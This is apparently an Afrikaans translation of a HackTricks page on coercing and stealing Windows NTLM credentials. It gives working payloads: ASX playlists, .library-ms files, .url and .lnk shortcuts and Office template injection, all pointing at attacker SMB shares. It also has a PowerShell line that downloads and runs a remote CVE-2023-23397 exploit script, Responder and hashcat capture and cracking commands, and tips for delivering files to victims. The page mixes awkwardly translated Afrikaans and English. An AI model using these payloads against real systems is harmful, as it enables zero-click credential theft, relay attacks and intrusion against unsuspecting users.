HackTricksPlekke om NTLM creds te steel
Reading time: 7 minutes
tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Kyk na al die wonderlike idees by https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ â van die aflaai van 'n microsoft word-lĂȘer aanlyn tot die ntlm leaks bron: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md en https://github.com/p0dalirius/windows-coerced-authentication-methods
Windows Media Player-afspeellyste (.ASX/.WAX)
As jy 'n teiken daartoe kan kry om 'n Windows Media Player-afspeellys wat jy beheer te open of te voorskou, kan jy leak NetâNTLMv2 deur die inskrywing na 'n UNC-pad te wys. WMP sal probeer om die verwysde media oor SMB te haal en sal implisiet outentiseer.
Voorbeeld payload:
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
Versameling en kraakproses:
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
ZIP-ingebedde .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer hanteer .library-ms-lĂȘers op 'n onveilige wyse wanneer hulle direk van binne 'n ZIP-argief geopen word. As die library-definisie na 'n afgeleĂ« UNC-pad wys (bv. \attacker\share), sal bloot die blaai/lanseer van die .library-ms binne die ZIP veroorsaak dat Explorer die UNC enumereer en NTLM-verifikasie na die aanvaller uitstuur. Dit lewer 'n NetNTLMv2 wat cracked offline of potentially relayed kan word.
Minimale .library-ms wat na 'n aanvaller-UNC wys
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Operasionele stappe
- Skep die .library-ms-lĂȘer met die XML hierbo (stel jou IP/hostname).
- Zip dit (on Windows: Send to â Compressed (zipped) folder) en lewer die ZIP by die teiken af.
- Start ân NTLM capture listener en wag dat die slagoffer die .library-ms van binne die ZIP oopmaak.
Outlook kalenderherinnering klankpad (CVE-2023-23397) â zeroâclick NetâNTLMv2 leak
Microsoft Outlook vir Windows het die uitgebreide MAPI-eiendom PidLidReminderFileParameter in kalenderitems verwerk. As daardie eiendom na ân UNC-pad wys (bv. \attacker\share\alert.wav), sou Outlook die SMB-share kontak wanneer die herinnering afgaan, leaking the userâs NetâNTLMv2 without any click. Dit is op 14 Maart 2023 reggestel, maar dit bly steeds hoogs relevant vir legacy/ongewysigde omgewings en vir historiese voorvalrespons.
Vinnige uitbuiting met PowerShell (Outlook COM):
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
Aan die luisteraarkant:
sudo responder -I eth0 # or impacket-smbserver to observe connections
Aantekeninge
- 'n slagoffer hoef slegs Outlook for Windows aan die gang te hĂȘ wanneer die herinnering afgaan.
- Die leak lewer NetâNTLMv2 wat geskik is vir offline cracking of relay (nie passâtheâhash nie).
.LNK/.URL ikoon-gebaseerde zeroâclick NTLM leak (CVEâ2025â50154 â bypass of CVEâ2025â24054)
Windows Explorer toon snelkoppelingâikone outomaties. Onlangse navorsing het getoon dat selfs nĂĄ Microsoft se April 2025âpatch vir UNCâikoonâsnelkoppelingen dit steeds moontlik was om NTLMâauthentisering sonder enige klikke te aktiveer deur die snelkoppeling se target op 'n UNCâpad te huisves en die ikoon plaaslik te hou (patch bypass toegeken CVEâ2025â50154). Slegs die besigtiging van die gids veroorsaak dat Explorer metadata vanaf die remote target haal, wat NTLM na die aanvaller se SMB server uitstuur.
Minimale Internet Shortcut payload (.url):
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0
Program-snelkoppeling payload (.lnk) deur PowerShell:
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
Delivery ideas
- Plaas die shortcut in 'n ZIP en kry die slagoffer om dit te deurblaai.
- Plaas die shortcut op 'n skryfbare share wat die slagoffer sal open.
- Kombineer dit met ander loklĂȘers in dieselfde gids sodat Explorer die items voorskou.
Office remote template injection (.docx/.dotm) to coerce NTLM
Office-dokumente kan na 'n eksterne template verwys. As jy die aangehegte template na 'n UNC-pad stel, sal die opening van die dokument by SMB autentiseer.
Minimale DOCX relationship-wysigings (inside word/):
- Wysig word/settings.xml en voeg die aangehegte template-verwysing by:
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
- Wysig word/_rels/settings.xml.rels en wys rId1337 na jou UNC:
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
- Herpak na .docx en lewer dit af. Begin jou SMB capture listener en wag vir die open.
Vir post-capture idees oor relaying of abusing NTLM, kyk:
Verwysings
- HTB Fluffy â ZIP .libraryâms auth leak (CVEâ2025â24071/24055) â GenericWrite â AD CS ESC16 to DA (0xdf)
- HTB: Media â WMP NTLM leak â NTFS junction to webroot RCE â FullPowers + GodPotato to SYSTEM
- Morphisec â 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
- MSRC â Microsoft mitigates Outlook EoP (CVEâ2023â23397) and explains the NTLM leak via PidLidReminderFileParameter
- Cymulate â Zeroâclick, one NTLM: Microsoft security patch bypass (CVEâ2025â50154)
tip
Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.